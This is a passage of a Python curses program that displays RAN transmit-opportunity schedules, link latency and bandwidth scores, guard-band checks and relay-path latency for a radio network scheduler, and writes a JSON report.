curses.A_UNDERLINE)\n \n if (height-1) >= 9:\n file_info_pad.noutrefresh(0, 0, 4, 2, 7, (width-1))\n else:\n 
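        # window shorter than the pad: clip the refresh so the pad bottom stops at the last screen row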
file_info_pad.noutrefresh(0, 0, 4, 2, (height-2), (width-1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_ran_stats(ran):\n global stdscr\n global ran_pad\n global text_d\n \n height, width = stdscr.getmaxyx()\n \n ran_pad.addstr(0, 0, \" RAN Configuration Name:..... {0:70}\".format(ran.name),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n ran_pad.addstr(1, 0, \" Center Frequency:........... {0} MHz{1:60}\".format(int(ran.freq)/1000000, ' '),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n ran_pad.addstr(2, 0, \" Epoch Size:................. {0} ms{1:64}\".format(ran.epoch_ms, ' '),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n ran_pad.addstr(3, 0, \" Guard Time:................. {0:0.3f} ms{1:62}\".format(ran.guard_ms, ' '),\n text_d['BG'] | curses.A_REVERSE | BOLD)\n \n start_row_pos = 9\n last_row_pos = 12\n \n if (height-1) >= last_row_pos:\n ran_pad.noutrefresh(0, 0, start_row_pos, 2, last_row_pos, (width-1))\n elif (height-1) >= start_row_pos:\n ran_pad.noutrefresh(0, 0, start_row_pos, 2, (height-1), (width-1))\n \n\n# ------------------------------------------------------------------------------\n\n\ndef print_links_info(links, num_rans):\n global stdscr\n global link_info_pad\n global text_d\n \n height, width = stdscr.getmaxyx()\n \n rows_needed = 1\n for l in links:\n if len(l.tx_sched) == 0:\n rows_needed += 4 + 1\n else:\n rows_needed += 4 + len(l.tx_sched)\n \n link_info_pad = curses.newpad(rows_needed, 102)\n link_info_pad.bkgd(text_d['BG'])\n \n link_info_pad.addstr(0, 0, \"{0:^102}\".format(\"RAN DETAILS\"), text_d['BG'] | curses.A_UNDERLINE)\n link_info_pad.addstr(0, 96, \"SCORE\", text_d['BG'] | curses.A_UNDERLINE)\n \n start_row = 1\n for idx, link in enumerate(links, start=0):\n print_link_info(link, start_row, idx)\n if len(link.tx_sched) > 0:\n start_row += 4 + len(link.tx_sched)\n else:\n start_row += 4 + 1\n \n start_row_num = 16 + (5 * num_rans)\n last_row_num = start_row_num + rows_needed\n \n if (height-1) >= last_row_num:\n link_info_pad.noutrefresh(0, 0, start_row_num, 2, last_row_num, (width-1))\n elif (height-1) >= start_row_num:\n link_info_pad.noutrefresh(0, 0, start_row_num, 2, (height-1), (width-1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_link_info(link, row, cp):\n global link_info_pad\n global mod_name\n global score_file\n\n txt_color = curses.color_pair((cp % 10) + 1)\n\n link_info_pad.addstr(row, 0, \"Link: {}\".format(link.name), txt_color | BOLD)\n link_info_pad.addstr(row+1, 0, \"Source Radio RF MAC Addr: {0:5d} [0x{0:04x}] \".format(int(link.src)),\n txt_color | BOLD)\n link_info_pad.addstr(row+2, 0, \"Destination Group RF MAC Addr: {0:5d} [0x{0:04x}] \".format(int(link.dst)),\n txt_color | BOLD)\n link_info_pad.addstr(row+1, 56, \"Max Latency Requirement: \", txt_color)\n link_info_pad.addstr(row+2, 56, \"Max Latency Achievable: \", txt_color | curses.A_UNDERLINE)\n link_info_pad.addstr(row+3, 56, \"Minimum Capacity Required: \", txt_color)\n link_info_pad.addstr(row+4, 56, \"Allocated Bandwidth: \", txt_color)\n\n scored_link = False\n if score_file is not None and ld_link_scores is not None:\n for score in ld_link_scores:\n if \"Link\" in score:\n # If Scoring Source and destination are on the same link.\n if (int(link.src) == int(score['Link']['LinkSrc'])) and (int(link.dst) == int(score['Link']['LinkDst'])):\n scored_link = True\n score_data = score\n break\n\n if not scored_link:\n link_info_pad.addstr(row+1, 84, \"No Entry in 
{}!\".format(score_file),\n txt_color | BOLD | curses.A_REVERSE)\n if link.max_latency_usec == 0:\n link_info_pad.addstr(row+2, 84, \"{0:^9}\".format('N/A'), txt_color | curses.A_UNDERLINE)\n else:\n link_info_pad.addstr(row+2, 84, \"{0:.3f} ms\".format(int(link.max_latency_usec) / 1000),\n txt_color | curses.A_UNDERLINE)\n \n else:\n if int(score_data[\"Latency\"][\"max_thd\"]) == 1000000.0:\n link_info_pad.addstr(row+1, 84, \"N/A\", txt_color)\n else:\n link_info_pad.addstr(row+1, 84, \"{0:.3f} ms\".format(int(score_data[\"Latency\"][\"max_thd\"])),\n txt_color)\n \n if link.max_latency_usec == 0:\n if score_data[\"Latency\"][\"max_thd\"] < 1000000.0:\n link_info_pad.addstr(row+2, 84, \"{0:^9}\".format('N/A'),\n txt_color | curses.A_UNDERLINE | curses.A_REVERSE)\n else:\n link_info_pad.addstr(row+2, 84, \"{0:^9}\".format('N/A'),\n txt_color | curses.A_UNDERLINE)\n elif link.max_latency_usec < score_data[\"Latency\"][\"max_thd\"]:\n link_info_pad.addstr(row+2, 84, \"{0:.3f} ms\".format(int(link.max_latency_usec) / 1000),\n txt_color | curses.A_UNDERLINE)\n else: \n link_info_pad.addstr(row+2, 84, \"{0:.3f} ms\".format(int(link.max_latency_usec) / 1000),\n txt_color | curses.A_UNDERLINE | curses.A_REVERSE)\n \n if not scored_link:\n link_info_pad.addstr(row+3, 84, \"No Entry in {}!\".format(score_file), txt_color |\n BOLD | curses.A_REVERSE)\n link_info_pad.addstr(row+4, 84, \"{0:0.3f} Mbps\".format(link.alloc_bw_mbps), txt_color)\n else:\n qp_ac_mbps = int(score_data[\"Bandwidth\"][\"min_thd\"]) / 1000 # get QoS Policy rate in Mbps\n link_info_pad.addstr(row+3, 84, \"{0:0.3f} Mbps\".format(qp_ac_mbps), txt_color)\n \n if qp_ac_mbps <= link.alloc_bw_mbps:\n link_info_pad.addstr(row+4, 84, \"{0:0.3f} Mbps\".format(link.alloc_bw_mbps), txt_color)\n else:\n link_info_pad.addstr(row+4, 84, \"{0:0.3f} Mbps\".format(link.alloc_bw_mbps), txt_color | curses.A_REVERSE)\n\n link_info_pad.addstr(row + 2, 96, \"{0:0.1f}\".format(link.latency_point_value),\n txt_color | curses.A_UNDERLINE | BOLD)\n link_info_pad.addstr(row + 4, 96, \"{0:0.1f}\".format(link.throughput_point_value),\n txt_color | curses.A_UNDERLINE | BOLD)\n\n if (len(link.tx_sched)) > 0:\n print_txops_info(link.tx_sched, row+3, cp)\n else:\n link_info_pad.addstr(row+3, 2, \" NO TXOPS DEFINED IN MDL FOR THIS LINK \",\n txt_color | curses.A_REVERSE | BOLD)\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txops_info(txops, row, cp):\n global link_info_pad\n \n for idx, txop in enumerate(txops, start=0):\n print_txop_info(txop, idx, row+idx, cp)\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txop_info(txop, idx, row, cp):\n global link_info_pad\n\n txt_color = curses.color_pair((cp % 10) + 1)\n txop_str = \" TxOp {0}: {1:6d} - {2:6d} us (TTL: {3:3d}) @ {4} MHz \\r\".format(\n idx+1, int(txop.start_usec), int(txop.stop_usec), int(txop.timeout), \n int(txop.freq)/1000000)\n\n link_info_pad.addstr(row, 0, txop_str, txt_color)\n \n if debug >= 2:\n print(\" TxOp {0}: {1:6d} - {2:6d} us (TTL: {3:3d}) @ {4} MHz\\r\".format(\n idx+1, int(txop.start_usec), int(txop.stop_usec), int(txop.timeout), \n int(txop.freq)/1000000))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txops_in_all_rans(rans, sel):\n global stdscr\n global epoch_pad\n global txop_display_pad\n global text_d\n \n height, width = stdscr.getmaxyx()\n \n rows_needed = (len(rans) * 5)\n epoch_pad = curses.newpad(rows_needed, 
102)\n epoch_pad.bkgd(text_d['BG'])\n\n start_row_num = 15\n last_row_num = start_row_num + rows_needed\n \n for idx, ran in enumerate(rans, start=0):\n print_txops_in_epoch(ran, idx, sel)\n\n if (height-1) >= last_row_num:\n epoch_pad.noutrefresh(0, 0, start_row_num, 2, last_row_num, (width-1))\n elif (height-1) >= start_row_num:\n epoch_pad.noutrefresh(0, 0, start_row_num, 2, (height-1), (width-1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_txops_in_epoch(ran, ran_num, sel):\n global stdscr\n global epoch_pad\n global txop_display_pad\n global text_d\n \n epoch_ms = ran.epoch_ms\n links = ran.links\n\n start_row_num = (ran_num * 5)\n bar = (int(epoch_ms))/100\n scale_str = \"one bar = {} ms\".format(bar)\n horizon = border_d['TS'] * 100\n \n if ran_num == sel:\n epoch_pad.addstr(start_row_num, 0, \"{0:>102}\".format(scale_str), text_d['BG'] | curses.A_REVERSE)\n epoch_pad.addstr(start_row_num, 0, \"{0}.) {1}\\t|\\tBW Efficiency: {2:5.2f}%\".\n format((ran_num+1), ran.name, ran.efficiency_pct), text_d['BG'] | curses.A_REVERSE |\n BOLD)\n epoch_pad.addstr(start_row_num, 51, '|'.format(\" \"), text_d['BG'] | curses.A_REVERSE | BOLD)\n epoch_pad.addstr(start_row_num, 54, 'Guardbands:', text_d['BG'] | curses.A_REVERSE | BOLD)\n\n if ran.gb_violated is False:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"OK\"), text_d['PASS_WHITE'] | BOLD)\n else:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"VIOLATION\"), text_d['ERROR_WHITE'] | BOLD | BLINK)\n\n epoch_pad.addstr(start_row_num + 1, 0, \"{0}{1}{2}\".format(border_d['TL'], horizon, border_d['TR']),\n text_d['BG'] | curses.A_REVERSE)\n epoch_pad.addstr(start_row_num + 2, 0, '{0}{1:100}{2}'.format(border_d['LS'], \" \", border_d['RS']),\n text_d['BG'] | curses.A_REVERSE)\n epoch_pad.addstr(start_row_num + 3, 0, \"{0}{1}{2}\".format(border_d['BL'], horizon, border_d['BR']),\n text_d['BG'] | curses.A_REVERSE)\n else:\n epoch_pad.addstr(start_row_num, 0, \"{0:>102}\".format(scale_str), text_d['BG'])\n epoch_pad.addstr(start_row_num, 0, \"{0}.) 
{1}\\t|\\tBW Efficiency: {2:5.2f}%\".\n format((ran_num+1), ran.name, ran.efficiency_pct), text_d['BG'] | BOLD)\n epoch_pad.addstr(start_row_num, 51, '|'.format(\" \"), text_d['BG'] | BOLD)\n epoch_pad.addstr(start_row_num, 54, '{}'.format(\"Guardbands:\"), text_d['BG'] | BOLD)\n\n if ran.gb_violated is False:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"OK\"), text_d['PASS_BLACK'] | BOLD)\n else:\n epoch_pad.addstr(start_row_num, 66, '{}'.format(\"VIOLATION\"), text_d['ERROR_BLACK'] | BOLD | BLINK)\n\n epoch_pad.addstr(start_row_num + 1, 0, \"{0}{1}{2}\".format(border_d['TL'], horizon, border_d['TR']),\n text_d['BG'])\n epoch_pad.addstr(start_row_num + 2, 0, '{0}{1:100}{2}'.format(border_d['LS'], \" \", border_d['RS']),\n text_d['BG'])\n epoch_pad.addstr(start_row_num + 3, 0, \"{0}{1}{2}\".format(border_d['BL'], horizon, border_d['BR']),\n text_d['BG'])\n \n for idx, link in enumerate(links, start=0):\n for txop in link.tx_sched:\n need_half_block_right = False\n need_half_block_left = False\n start_pos = (int(txop.start_usec) / 1000) / bar\n stop_pos = (int(txop.stop_usec) / 1000) / bar\n frac_start = 0\n frac_stop = 0\n \n if math.floor(start_pos) > 0:\n frac_start = start_pos % math.floor(start_pos)\n start_pos = math.floor(start_pos)\n if frac_start >= 0.75:\n start_pos += 1\n elif frac_start >= 0.25:\n need_half_block_right = True\n \n if math.floor(stop_pos) > 0:\n frac_stop = stop_pos % math.floor(stop_pos)\n stop_pos = math.floor(stop_pos)\n if frac_stop >= 0.75:\n stop_pos += 1\n elif frac_stop >= 0.25:\n need_half_block_left = True\n \n num_bars = stop_pos - start_pos\n if need_half_block_right and need_half_block_left:\n graphic = u'\\u2590' + u'\\u2588' * int(num_bars-1) + u'\\u258c'\n elif need_half_block_right:\n graphic = u'\\u2590' + u'\\u2588' * int(num_bars-1)\n elif need_half_block_left:\n graphic = u'\\u2588' * int(num_bars) + u'\\u258c'\n else:\n graphic = u'\\u2588' * int(num_bars)\n\n if ran_num == sel:\n epoch_pad.addstr(start_row_num+2, int(start_pos)+1, graphic, curses.color_pair((idx % 10) + 11))\n else:\n epoch_pad.addstr(start_row_num+2, int(start_pos)+1, graphic, curses.color_pair((idx % 10) + 1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_toolbar():\n global stdscr\n global toolbar_pad\n global text_d\n\n height, width = stdscr.getmaxyx()\n tp_height, tp_width = toolbar_pad.getmaxyx()\n\n select_msg = \"ENTER RAN # FOR DETAILS\"\n quit_msg = \"PRESS 'q' TO QUIT\"\n\n toolbar_pad.addstr(0, 0, \"{0}\".format(border_d['TS'] * (tp_width - 1)))\n toolbar_pad.addstr(1, 0, \" {0} | {1} \".format(select_msg, quit_msg), text_d['BORDER'])\n toolbar_pad.addstr(1, 34, 'q', text_d['BORDER'] | BOLD | curses.A_REVERSE)\n\n toolbar_pad.noutrefresh(0, 0, (height - 3), 0, (height - 1), (width - 1))\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_too_short(width):\n global stdscr\n global text_d\n \n bangs = '!' * int((width-49)/2)\n msg1 = bangs + ' DID YOU WANT TO SEE SOMETHING IN THIS WINDOW? ' + bangs\n msg2 = bangs + ' TRY MAKING THE WINDOW A LITTLE BIT DEEPER. 
' + bangs\n msg3 = bangs + ' RESIZE WINDOW TO CONTINUE ' + bangs\n stdscr.addstr(0, 0, \"{0:^{1}}\".format(msg1, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(1, 0, \"{0:^{1}}\".format(msg2, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(2, 0, \"{0:^{1}}\".format(msg3, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n\n\n# ------------------------------------------------------------------------------\n\n\ndef print_too_skinny(width):\n global stdscr\n global text_d\n \n bangs = '!' * int((width-34)/2)\n msg1 = bangs + ' NOT SURE WHAT YOU EXPECT TO ' + bangs\n msg2 = bangs + ' SEE ON SUCH A SKINNY SCREEN ' + bangs\n msg3 = bangs + ' TRY MAKING IT WIDER, OR RISK ' + bangs\n msg4 = bangs + ' SKYNET ' + bangs\n stdscr.addstr(0, 0, \"{0:^{1}}\".format(msg1, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(1, 0, \"{0:^{1}}\".format(msg2, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(2, 0, \"{0:^{1}}\".format(msg3, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n stdscr.addstr(3, 0, \"{0:^{1}}\".format(msg4, width), text_d['ERROR_BLACK'] | BOLD | BLINK)\n \n\n# ------------------------------------------------------------------------------\n\n\ndef init_text_colors():\n global text_d\n global border_d\n\n # Color Pair Setup\n curses.init_pair(1, 114, 235) # greenish 1\n curses.init_pair(2, 152, 235) # bluish 1\n curses.init_pair(3, 182, 235) # purplish 1\n curses.init_pair(4, 210, 235) # redish 1\n curses.init_pair(5, 229, 235) # yellowish 1\n curses.init_pair(6, 42, 235) # greenish 2\n curses.init_pair(7, 37, 235) # bluish 2\n curses.init_pair(8, 135, 235) # purplish 2\n curses.init_pair(9, 175, 235) # redish 2\n curses.init_pair(10, 222, 235) # yellowish 2\n curses.init_pair(11, 114, 15) # greenish 1 on white\n curses.init_pair(12, 152, 15) # bluish 1 on white\n curses.init_pair(13, 182, 15) # purplish 1 on white\n curses.init_pair(14, 210, 15) # redish 1 on white\n curses.init_pair(15, 229, 15) # yellowish 1 on white\n curses.init_pair(16, 42, 15) # greenish 2 on white\n curses.init_pair(17, 37, 15) # bluish 2 on white\n curses.init_pair(18, 135, 15) # purplish 2 on white\n curses.init_pair(19, 175, 15) # redish 2 on white\n curses.init_pair(20, 222, 15) # yellowish 2 on white\n curses.init_pair(31, 12, 235) # Windows: MSG ERROR - redish\n curses.init_pair(32, 14, 235) # Windows: MSG WARNING - yellowish\n curses.init_pair(33, 8, 235) # Windows: MSG INFO - grayish\n curses.init_pair(34, 24, 235) # Windows: MSG UNKNOWN - bluish\n curses.init_pair(35, 47, 235) # Windows: Trend Up - greenish\n curses.init_pair(36, 24, 235) # Windows: Trend Steady - bluish\n curses.init_pair(37, 160, 235) # Windows: Trend Down - redish\n curses.init_pair(38, 14, 235) # Windows: Warning - Black\n curses.init_pair(39, 12, 15) # Windows: Error - White\n curses.init_pair(40, 12, 235) # Windows: Error - Black\n curses.init_pair(247, 63, 235) # border\n curses.init_pair(248, 11, 235)\n curses.init_pair(249, 27, 235)\n curses.init_pair(250, 10, 235)\n curses.init_pair(251, 10, 15)\n curses.init_pair(252, 10, 235)\n curses.init_pair(253, 9, 15)\n curses.init_pair(254, 9, 235)\n curses.init_pair(255, 15, 235)\n\n text_d['BORDER'] = curses.color_pair(247)\n text_d['WARNING_BLACK'] = curses.color_pair(248)\n text_d['BANNER'] = curses.color_pair(249)\n text_d['FOR_SCORE'] = curses.color_pair(250)\n text_d['PASS_WHITE'] = curses.color_pair(251)\n text_d['PASS_BLACK'] = curses.color_pair(252)\n text_d['ERROR_WHITE'] = curses.color_pair(253)\n text_d['ERROR_BLACK'] = 
curses.color_pair(254)\n text_d['BG'] = curses.color_pair(255)\n\n # If running on Windows, use the following terminal colors\n if os.name == 'nt':\n text_d['BORDER'] = curses.color_pair(247)\n text_d['WARNING_BLACK'] = curses.color_pair(38)\n text_d['BANNER'] = curses.color_pair(249)\n text_d['FOR_SCORE'] = curses.color_pair(250)\n text_d['PASS_WHITE'] = curses.color_pair(251)\n text_d['PASS_BLACK'] = curses.color_pair(252)\n text_d['ERROR_WHITE'] = curses.color_pair(39)\n text_d['ERROR_BLACK'] = curses.color_pair(40)\n text_d['BG'] = curses.color_pair(255)\n\n border_d['LS'] = u'\\u2502'\n border_d['RS'] = u'\\u2502'\n border_d['TS'] = u'\\u2500'\n border_d['BS'] = u'\\u2500'\n border_d['TL'] = u'\\u250c'\n border_d['TR'] = u'\\u2510'\n border_d['BL'] = u'\\u2514'\n border_d['BR'] = u'\\u2518'\n\n\n# ------------------------------------------------------------------------------\n\ndef generated_sorted_list(rans_list, link_scores):\n scored_links = []\n\n if link_scores is not None:\n for ran in rans_list:\n greedy_ran = {\"Epoch\": int(ran.epoch_ms)/1000, \"Guard_Band\": ran.guard_ms/1000, \"Links\": []} # s, s\n for l in ran.links:\n link_data = {}\n for d in link_scores:\n if \"Link\" in d:\n if (int(l.src) == int(d['Link']['LinkSrc'])) and (int(l.dst) == int(d['Link']['LinkDst'])):\n link_data = {\"Link\": l}\n bandwidth = {}\n latency = {}\n bandwidth['bw_min_thd'] = 0\n bandwidth['bw_max_thd'] = 0\n bandwidth['bw_coef'] = 0\n if \"Latency\" in d:\n if \"max_thd\" in d['Latency']:\n latency['lat_max_thd'] = d['Latency']['max_thd']\n if \"min_thd\" in d['Latency']:\n latency['lat_min_thd'] = d['Latency']['min_thd']\n else:\n if debug >= 1:\n print(\"The key 'Latency' was not found in the dictionary for the specified link.\")\n\n if \"Bandwidth\" in d:\n if \"min_thd\" in d['Bandwidth']:\n bandwidth['bw_min_thd'] = d['Bandwidth']['min_thd']\n if \"max_thd\" in d['Bandwidth']:\n bandwidth['bw_max_thd'] = d['Bandwidth']['max_thd']\n if \"coef\" in d['Bandwidth']:\n bandwidth['bw_coef'] = d['Bandwidth']['coef']\n else:\n if debug >= 1:\n print(\"The key 'Bandwidth' was not found in the dictionary for the specified link.\")\n\n link_data[\"Bandwith_Data\"] = bandwidth\n link_data[\"Latency_Data\"] = latency\n greedy_ran[\"Links\"].append(link_data)\n else:\n if debug >= 1:\n print(\"No match of SRC and DST: this link is {0} --> {1}\\r\".format(l.src, l.dst))\n else:\n if debug >= 1:\n print(\"No match for key 'Link' in score file for link.\\r\")\n if greedy_ran[\"Links\"]:\n scored_links.append(greedy_ran)\n\n for ran in scored_links:\n ran[\"Links\"] = sorted(ran[\"Links\"], key=lambda x: x[\"Bandwith_Data\"][\"bw_coef\"], reverse=True)\n\n return scored_links\n\n\ndef min_required_schedule(rans_list, link_scores):\n sorted_rans = generated_sorted_list(rans_list, link_scores)\n\n\ndef max_requested_schedule(rans_list, link_scores, mult):\n bandwidth = MAX_BW_MBPS * 1000 # kb/s\n sorted_rans = generated_sorted_list(rans_list, link_scores)\n for ran in sorted_rans:\n gb = ran[\"Guard_Band\"] # s\n epoch = ran[\"Epoch\"] # s\n epoch_ms = epoch * 1000\n uepoch = epoch * 1000000 # us\n ugb = gb * 1000000\n links = ran[\"Links\"]\n epoch_remaining = uepoch # us\n for link_data in links:\n link = link_data[\"Link\"]\n bw_data = link_data[\"Bandwith_Data\"]\n lat_data = link_data[\"Latency_Data\"]\n min_point_threshold = bw_data['bw_min_thd'] # s\n min_point_threshold_time = min_point_threshold / bandwidth # s\n mix_point_threshold_time_per_epoch = min_point_threshold_time * uepoch # us\n 
max_point_threshold = bw_data['bw_max_thd'] # s\n max_point_threshold_time = max_point_threshold / bandwidth # s\n max_point_threshold_time_per_epoch = max_point_threshold_time * uepoch # us\n coef = bw_data['bw_coef']\n latency = lat_data[\"lat_min_thd\"] / 1000 # us\n guard_band_count = math.ceil(max_point_threshold_time / latency) # s/s\n total_gb_time = guard_band_count * ugb # s\n bw_consumed = max_point_threshold_time_per_epoch+total_gb_time\n if epoch_remaining > bw_consumed:\n link.greedy_tx_dur_per_epoch_usec = max_point_threshold_time_per_epoch\n link.calc_greedy_alloc_bw_mbps(epoch_ms)\n link.calc_greedy_throughput_value(min_point_threshold, max_point_threshold, coef, mult)\n epoch_remaining = epoch_remaining - bw_consumed\n\n\n# ------------------------------------------------------------------------------\n\n\ndef write_report_to_json(rans_list):\n new_rans_list = copy.deepcopy(rans_list)\n ran_config_dict = {}\n for ran in new_rans_list:\n ran_dict = vars(ran)\n links = []\n for l in ran.links:\n link_dict = vars(l)\n toxp_list = []\n for t in l.tx_sched:\n toxp_list.append(vars(t))\n link_dict['tx_sched'] = toxp_list\n if link_dict['qos_policy'] is not None:\n link_dict['qos_policy'] = vars(l.qos_policy)\n links.append(link_dict)\n ran_dict['links'] = links\n ran_config_dict[ran.name] = ran_dict\n\n cwd = os.getcwd()\n log_file_name = 'TxOpSched_Report_{}.json'\n log_dir_name = 'TxOpSched_Logs'\n log_dir = os.path.join(cwd, log_dir_name)\n log_file = os.path.join(log_dir, log_file_name)\n\n if not os.path.isdir(log_dir):\n os.mkdir(log_dir)\n\n with open(log_file.format(now), 'w') as f:\n json.dump(ran_config_dict, f, indent=4, sort_keys=True)\n\n# ------------------------------------------------------------------------------\n\n\ndef find_next_step_in_relay(ran, initial_dest, target_dest, tmnsradio_list, relay_path):\n # Change to use IDs instead of ports\n previous_links = []\n previous_groups = []\n for link in relay_path:\n previous_links.append(link)\n previous_groups.append(link.src_group)\n\n for radio in tmnsradio_list:\n if radio.incoming_group_id == initial_dest:\n new_src = radio.id\n break\n\n for link in ran.links:\n if link.src_id == new_src:\n if link.dst_id not in previous_groups:\n new_dest = link.dst_id\n if link in previous_links or link.src_group in previous_groups:\n pass\n else:\n relay_path.append(link)\n previous_links.append(link)\n if link.dst == target_dest:\n break\n find_next_step_in_relay(ran, new_dest, target_dest, tmnsradio_list, relay_path)\n\n return relay_path\n\n\ndef generate_relay_path(ran, initial_dest, target_dest, tmnsradio_list, relay_path):\n relay_path = find_next_step_in_relay(ran, initial_dest, target_dest, tmnsradio_list, relay_path)\n if relay_path[-1].dst != target_dest:\n relay_path = []\n return relay_path\n\n\ndef calculate_latency_relay(relay_path, epoch_us):\n source = relay_path[0]\n other_relays = relay_path[1:]\n max_latency = 0\n for initial_tx in source.tx_sched:\n epoch_count = 0\n epoch_lap = False\n initial_end_time = initial_tx.stop_usec\n previous_end_time = initial_end_time\n for relay in other_relays:\n relay_start_time = epoch_us\n relay_latency = epoch_us\n for tx in relay.tx_sched:\n if previous_end_time < tx.start_usec:\n current_start_time = tx.start_usec\n else:\n current_start_time = tx.start_usec + epoch_us\n current_latency = current_start_time - previous_end_time\n if current_latency < relay_latency:\n relay_latency = current_latency\n relay_start_time = tx.start_usec\n if current_start_time >= 
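At its core, max_requested_schedule() above is a greedy airtime allocator: links are visited in descending bw_coef order, and each is granted its requested transmit time plus guard-band overhead for as long as the epoch budget holds out. A hedged sketch of that accounting with illustrative field names and self-consistent units (the original mixes kb, s, and us in its comments):

import math

def greedy_allocate(links, epoch_usec, guard_usec):
    # links: dicts with illustrative keys 'name', 'airtime_usec', 'coef',
    # 'latency_usec'; one guard band is charged per transmit opportunity
    # needed to meet the latency bound within the epoch.
    remaining = epoch_usec
    grants = {}
    for link in sorted(links, key=lambda l: l['coef'], reverse=True):
        n_txops = math.ceil(link['airtime_usec'] / link['latency_usec'])
        cost = link['airtime_usec'] + n_txops * guard_usec
        if cost <= remaining:
            grants[link['name']] = link['airtime_usec']
            remaining -= cost
    return grants, remaining

links = [
    {'name': 'A', 'airtime_usec': 30000, 'coef': 5, 'latency_usec': 10000},
    {'name': 'B', 'airtime_usec': 50000, 'coef': 2, 'latency_usec': 25000},
]
print(greedy_allocate(links, epoch_usec=100000, guard_usec=1000))
# ({'A': 30000, 'B': 50000}, 15000)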
epoch_us:\n epoch_lap = True\n if current_start_time < epoch_us:\n epoch_lap = False\n if epoch_lap:\n epoch_count += 1\n latency = relay_start_time + (epoch_count * epoch_us) - initial_end_time\n if latency > max_latency:\n max_latency = latency\n return max_latency\n\n\ndef score_link_with_relay(rans_list, d, tmnsradio_list, initial_link, epoch_ms):\n for ran in rans_list:\n\n epoch_us = int(int(epoch_ms) * 1000)\n relay_path = [initial_link]\n initial_dest = initial_link.dst_id\n target_dest = int(d['Link']['LinkDst'])\n relay_path = find_next_step_in_relay(ran, initial_dest, target_dest, tmnsradio_list, relay_path)\n relay_throughput_scores = []\n max_throughput_est_scores = []\n\n if relay_path:\n if \"Latency\" in d:\n if \"max_thd\" in d['Latency']:\n lat_max_thd = d['Latency']['max_thd']\n if \"min_thd\" in d['Latency']:\n lat_min_thd = d['Latency']['min_thd']\n else:\n if debug >= 1:\n print(\"The key 'Latency' was not found in the dictionary for the specified link.\")\n if \"Bandwidth\" in d:\n if \"min_thd\" in d['Bandwidth']:\n bw_min_thd = d['Bandwidth']['min_thd']\n if \"max_thd\" in d['Bandwidth']:\n bw_max_thd = d['Bandwidth']['max_thd']\n if \"coef\" in d['Bandwidth']:\n bw_coef = d['Bandwidth']['coef']\n else:\n if debug >= 1:\n print(\"The key 'Bandwidth' was not found in the dictionary for the specified link.\")\n if \"Multiplier\" in d:\n mult = d[\"Multiplier\"]\n else:\n if debug >= 1:\n print(\n \"The key 'Multiplier' was not found in the dictionary for the specified link.\")\n\n latency = calculate_latency_relay(relay_path, epoch_us)\n for link in relay_path:\n link.max_latency_usec = latency\n link.calc_throughput_value(bw_min_thd, bw_max_thd, bw_coef, mult)\n link.calc_latency_value(lat_max_thd, lat_min_thd, mult)\n max_requested_schedule(rans_list, ld_link_scores, mult)\n relay_throughput_scores.append(link.throughput_point_value)\n max_throughput_est_scores.append(link.greedy_throughput_point_value)\n\n minimum_score = min(relay_throughput_scores)\n min_max_estimate = min(max_throughput_est_scores)\n\n for link in relay_path:\n link.throughput_point_value = minimum_score\n link.greedy_throughput_point_value = min_max_estimate\n\n\ndef score_link_with_no_relay(rans_list, l, d):\n \"\"\"If Scoring Source and destination are on the same link.\"\"\"\n lat_min_thd = 0\n lat_max_thd = 0\n bw_min_thd = 0\n bw_max_thd = 0\n bw_coef = 0\n mult = 1\n if \"Latency\" in d:\n if \"max_thd\" in d['Latency']:\n lat_max_thd = d['Latency']['max_thd']\n if \"min_thd\" in d['Latency']:\n lat_min_thd = d['Latency']['min_thd']\n else:\n if debug >= 1:\n print(\"The key 'Latency' was not found in the dictionary for the specified link.\")\n if \"Bandwidth\" in d:\n if \"min_thd\" in d['Bandwidth']:\n bw_min_thd = d['Bandwidth']['min_thd']\n if \"max_thd\" in d['Bandwidth']:\n bw_max_thd = d['Bandwidth']['max_thd']\n if \"coef\" in d['Bandwidth']:\n bw_coef = d['Bandwidth']['coef']\n else:\n if debug >= 1:\n print(\"The key 'Bandwidth' was not found in the dictionary for the specified link.\")\n if \"Multiplier\" in d:\n mult = d[\"Multiplier\"]\n else:\n if debug >= 1:\n print(\n \"The key 'Multiplier' was not found in the dictionary for the specified link.\")\n l.calc_latency_value(int(lat_max_thd), int(lat_min_thd), mult)\n l.calc_throughput_value(bw_min_thd, bw_max_thd, bw_coef, mult)\n max_requested_schedule(rans_list, ld_link_scores, mult)\n\n\ndef score_transmission_schedule(rans_list, ld_link_scores, tmnsradio_list=None):\n if ld_link_scores is not None:\n for d in 
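calculate_latency_relay() above walks the relay path hop by hop and, for each hop, finds the earliest start of its next transmit slot, rolling into the following epoch when every slot in the current one has already passed. A small sketch of that wrap-around step (next_hop_wait is an illustrative name):

def next_hop_wait(prev_end_usec, starts_usec, epoch_usec):
    # Slots that already started this epoch are only reachable next epoch.
    candidates = [s if s >= prev_end_usec else s + epoch_usec for s in starts_usec]
    start = min(candidates)
    return start, start - prev_end_usec   # absolute start, added latency

# A hop finishing at t=80ms catches the 10ms slot of the *next* epoch:
print(next_hop_wait(80000, [10000, 50000], 100000))   # (110000, 30000)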
